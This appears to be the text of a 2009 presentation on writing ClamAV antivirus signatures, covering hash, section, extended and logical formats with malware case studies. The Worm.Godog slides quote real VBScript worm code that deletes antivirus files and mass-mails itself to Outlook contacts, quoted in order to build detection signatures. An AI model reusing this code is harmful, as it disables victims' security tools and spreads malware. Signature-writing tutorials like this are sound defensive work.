Writing ClamAV Signatures

Alain Zidouemba March 4, 2009

About the presenter

Alain Zidouemba
VRT Research Engineer for over a year Primary responsibilities:
Malware research & signatures generation ClamAV Vulnerability research & rules generation Snort

Before Sourcefire: Anti-Malware Research Engineer

Outline
What is ClamAV Where to get ClamAV Different ClamAV signature formats:
.hdb .mdb .ndb .ldb

Whitelisting Q&A

ClamAV

What is ClamAV?
Clam AntiVirus (ClamAV) is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways Provides a number of utilities including:
A flexible and scalable multi-threaded daemon (clamd) A command line scanner (clamscan) An advanced tool for automatic database updates (freshclam) Sigtool more later

Where can I get ClamAV from?

Latest stable release: ClamAV 0.94.2
http://www.clamav.net/download/sources

Most popular UNIX operating systems are supported:

GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X

Up-to-date list of binary packages is available at our website:

http://clamav.net/download/packages

Why learn how to write sigs?

I thought Sourcefire released signatures updates several times a day!

ClamAV malware detection

Goal: recognize and block malware Detection is:
File-centric Focus on recognizing malicious code in file

Not intended to replace desktop AV First line of defense

ClamAV Virus Database (CVD)

The ClamAV project distributes two CVD files
main.cvd daily.cvd

Sigtool (ships with ClamAV) can display detailed information on CVD files:

Various signature files in .cvd archive

10

Writing signatures for ClamAV

Hash database: *.hdb

The format for .hdb files is as follows:
MD5:Size:MalwareName

To create a signature for test.exe use the --md5 option of sigtool:

12

Hashdatabase:*.hdb(contd)
Thatsit!Thesignatureisreadytobeused:

The name for the detection can be changed:

13

MD5, PE-section based: *.mdb

The format for .mdb files is as follows:
PESectionSize:MD5:MalwareName

The easiest way to generate MD5 based section signatures is to extract target PE sections into separate files and then run sigtool with the option -- mdb:

14

Case study: Trojan.Bagle-328

IDAProindicatesthatthesampleispacked Packed with Themida (as per PEiD)

15

Case study: Trojan.Bagle-328 (cont'd)

Themida is used by malware writers...but also by legitimate products false positive likely We can use pe-sig, a Ruby script that will create sigs for each section of a PE file:

Finally, the signature is:

237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328
16

Extended sig. format: *.ndb

The format for .ndb files is as follows:
MalwareName:TargetType:Offset:HexSignature

TargetType is one of the following numbers specifying the type of the target file:
0: 1: 2: 3: Any file Portable Executable OLE2 component (eg: VBA script) HTML (normalized) 4: 5: 6: 7: Mail File Graphics ELF ASCII text file (normalized)

17

Case study: Trojan.Exchanger

Many files that are very similar yet different

18

Case study: Trojan.Exchanger (contd)

5.exe:

Opcode:
e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Signature:
Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

19

Case study: Trojan.Exchanger (contd)

7.exe:

Opcode:
e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

Signature:
Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

20

Case study: Trojan.Exchanger (contd)

Signature for 5.exe:
Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Signature for 7.exe:

Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

Signature to detect both 5.exe and 7.exe:

Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4

21

Case study: Trojan.Exchanger (contd)

Moreover, for 5.exe:
EP: 0x4094E0 Binary string: 0x4095C5

For 7.exe:
EP: 0x406D87 Binary string: 0x406E6C

In both cases the distance between EP and our binary string is the same: 0xE5 = 229 (decimal)
22

Case study: Trojan.Exchanger (contd)

Finally we can rewrite the signature to be:
Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4

This signature is more precise and even matches other samples:

23

Logical signatures: *.ldb

Logical signatures introduced in ClamAV 0.94 The format for .ldb files is as follows:
SignatureName;TargetDescriptionBlock;LogicalExpr ession;Subsig0;Subsig1;Subsig2;...

24

Case study: Worm.Godog

A mass-mailer worm, code is in VBS
Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro" legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*") If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal" legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*") if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro" legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*") if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal" legions.DeleteFile (Registro & "\AVPersonal\*.*") if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98" legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*") legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE") legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")

25

Case study: Worm.Godog (contd)

After normalization, we can create 4 signatures to detect each attempt to disable AV tools as follows:
(0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c {-100}2e64656c65746566696c652028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c (1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f {-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f (2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028 {-25}202620225c6176706572736f6e616c

(3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e {-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e

26

Case study: Worm.Godog (contd)

Worm also send itself to the first 8000 contacts found in the address book:
Set Create = CreateObject ("Scripting.FileSystemObject") Set mail = Create.CreateTextFile("C:\mail.vbs") mail.writeline "On Error Resume Next" mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E" mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")" mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")" mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")" mail.writeline "For A = 1 To Mail.AddressLists.Count" mail.writeline "Set B = Mail.AddressLists (A)" mail.writeline "Counter = 1" mail.writeline "Set C = leg.CreateItem (0)" mail.writeline "For D = 1 To B.AddressEntries.Count" mail.writeline "E = B.AddressEntries (Counter)" mail.writeline "C.Recipients.Add E" mail.writeline "Counter = Counter + 1" mail.writeline "If Counter > 8000 Then Exit For" mail.writeline "Next" mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34) mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34) mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34) mail.writeline "C.DeleteAfterSubmit = True" mail.writeline "C.Send" mail.writeline "Next" mail.Close legion.Run ("C:\mail.vbs")

27

Case study: Worm.Godog (contd)

A signature to detect this worm portion of the file could be:
(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74 {-100}726563697069656e74732e616464{-100}696620{-10}203e20 {-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464 {-150}2e73656e64

Finally, we can write this highly flexible signature:

Worm.Godog;Target:0;((0|1|2|3)& (4));(0);(1);(2);(3);(4)

in a .ldb file:
Worm.Godog;Target:0;((0|1|2|3)& (4));66696c656578697374732028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;66696c6565786973747328{25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{300}2e6174746163686d656e74732e616464{-150}2e73656e64

28

Whitelisting
To whitelist a specific file create an entry in a database file with the extension of .fp following the MD5 signature format:
MD5:FileSize:Comment

29

Whitelisting(contd)
To whitelist a specific signature inside main.cvd add the following entry into a local file local.ign:
db_name:line_number:signature_name

ToignorethemyTestSignatureatline23 in test.ndb:
test.ndb:23:myTestSignature

Daily.ign:

30

More questions?
clamav-users@lists.clamav.net - user questions clamav-devel@lists.clamav.net - technical discussions Alternatively you can try asking on the #clamav IRC channel on irc.freenode.net If you have questions or comments on this presentation: azidouemba@sourcefire.com

31

ClamAV/VRT/Sourcefire
Websites
http://www.clamav.net http://www.snort.org htttp://www.sourcefire.com

Blogs
http://clam-av.blogspot.com http://vrt-sourcefire.blogspot.com

32

Contribute
Sample submission
http://www.clamav.net/sendvirus/

Upload statistics:
freshclam --submit-stats

Bug submission
http://bugs.clamav.net

33

Q&A

NOW GO AND WRITE SIGNATURES!

35

Source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714